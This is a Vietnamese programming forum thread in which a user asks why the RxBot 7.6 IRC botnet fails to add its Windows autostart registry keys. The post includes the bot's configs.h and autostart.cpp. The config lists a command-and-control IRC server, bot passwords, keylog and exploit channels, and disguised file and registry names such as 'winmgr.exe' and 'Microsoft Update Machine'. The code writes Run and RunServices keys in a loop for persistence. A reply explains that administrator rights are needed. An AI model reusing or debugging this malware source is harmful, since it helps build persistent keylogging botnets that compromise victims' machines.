Chào mừng đến với Diễn đàn lập trình - Cộng đồng lập trình.
Kết quả 1 đến 2 của 2
 1. #1
  Ngày tham gia
  Sep 2015
  Đang ở
  Hà Nội
  Bài viết
  0

  [RxBot] Không thêm khóa vào registry đc

  Mình đang xây dựng 1 mô phỏng, có sử dụng con bot rxbot để thả vào máy mô phỏng, mình dùng source bản 7.6, đã chạy được nhưng có 1 cái là nó không thêm khóa registry để tự động khởi động cùng windows được, mình không rõ là tại sao :'( mong các[COD] bạn chỉ giáo
  mình nghĩ nó chỉ có vấn đề ở thư viện configs.h và hàm autostart thôi, sau đây là đoạnc code của 2 cái này, ngoài ra mình có đính kèm source code nếu các bạn muốn xem thêm.
  Hy vọng được các bro chỉ giáo sớm (
  configs.h
  Mã:
  // bot configuration (Lsass by Uncanny) 
  int port = 6667;				// server port
  int port2 = 6667;				// backup server port
  int socks4port = 38;			// Port # for sock4 daemon to run on - CHANGE THIS!!!
  int tftpport = 69;				// Port # for tftp daemon to run on
  int httpport = 81;			// Port # for http daemon to run on
  int rloginport = 37;			// Port # for rlogin daemon to run on
  BOOL topiccmd = TRUE;			// set to TRUE to enable topic commands
  BOOL rndfilename = TRUE;		// use random file name
  BOOL AutoStart = TRUE;			// enable autostart registry keys
  char prefix = '.';				// command prefix (one character max.)
  int maxrand = 6;				// how many random numbers in the nick
  int nicktype = CONSTNICK;		// nick type (see rndnick.h)
  BOOL nickprefix = TRUE;			// nick uptime & mirc prefix
  
  #ifdef DEBUG_LOGGING
  char logfile[]="c:\\debug.txt";
  #endif
  
  #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
  
  #else // Recommended to use this only for Crypt() setup, this is unsecure.
  
  char botid[] = "Bot";						// bot id
  char version[] = "[RxBot v7.6 modded by Tr0gd0r]";		// Bots !version reply
  char password[] = "1234";					// bot password
  char server[] = "aenigma.gotd.org";		// server
  char serverpass[] = "1234";						// server password
  char channel[] = "#bot1";				// channel that the bot should join
  char chanpass[] = "1234";						// channel password
  char server2[] = "";						// backup server (optional)
  char channel2[] = "";						// backup channel (optional)
  char chanpass2[] = "";						// backup channel password (optional)
  char filename[] = "winmgr.exe";			// destination file name
  char keylogfile[] = "system.txt";				// keylog filename
  char valuename[] = "Microsoft Update Machine";		// value name for autostart
  char nickconst[] = "n-";					// first part to the bot's nick
  char szLocalPayloadFile[]="msconfig.dat";	// Payload filename
  char modeonconn[] = "-x+B";					// Can be more than one mode and contain both + and -
  char exploitchan[] = "#bot1";					// Channel where exploit messages get redirected
  char keylogchan[] = "#bot1"; 					// Channel where keylog messages get redirected
  char psniffchan[] = "#n";						// Channel where psniff messages get redirected 
  
  char *authost[] = {
  	"*@*",
  };
  
  char *versionlist[] = {
  	"mIRC v6.03 Khaled Mardam-Bey",
  	"mIRC v6.10 Khaled Mardam-Bey",
  	"mIRC v6.12 Khaled Mardam-Bey",
  	"mIRC v6.14 Khaled Mardam-Bey"
  };
  
  char regkey1[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  char regkey2[]="Software\\Microsoft\\Windows\\CurrentVersion\\RunServices";
  char regkey3[]="Software\\Microsoft\\OLE";
  char regkey4[]="SYSTEM\\CurrentControlSet\\Control\\Lsa";
  
  #endif
  autostart.cpp
  Mã:
  #include "includes.h"
  #include "functions.h"
  #include "externs.h"
  
  // globals
  #ifndef NO_REGISTRY
  int registry_delay=60000;
  #endif
  
  AUTOSTART autostart[]={
  	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey1},
  	{HKEY_LOCAL_MACHINE,(LPCTSTR)regkey2},
  	{HKEY_CURRENT_USER,(LPCTSTR)regkey1}
  };
  
  void AutoStartRegs(char *nfilename)
  {
  	HKEY key;
  
  	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
  		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
  		if (nfilename)
  			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
  		else
  			fRegDeleteValue(key, valuename); 
  		fRegCloseKey(key); 
  	}
    
  	return;
  }
  
  #ifndef NO_REGISTRY
  DWORD WINAPI AutoRegistry(LPVOID param)
  {
  	char *nfilename = (char *)param;
  
  	while (1) {
  		AutoStartRegs(nfilename);
  		Sleep(registry_delay);
  	}
  	return 0;
  }
  #endif

 2. #2
  Ngày tham gia
  Sep 2015
  Bài viết
  0
  Đây là chức năng bảo mật mới của Microsoft, từ phiên bản window vista trở lên nếu muốn chỉnh sửa trong HKEY_LOCAL_MACHINE thì bạn phải chạy với quyền admin.

 

 

Quyền viết bài

 • Bạn Không thể gửi Chủ đề mới
 • Bạn Không thể Gửi trả lời
 • Bạn Không thể Gửi file đính kèm
 • Bạn Không thể Sửa bài viết của mình
 •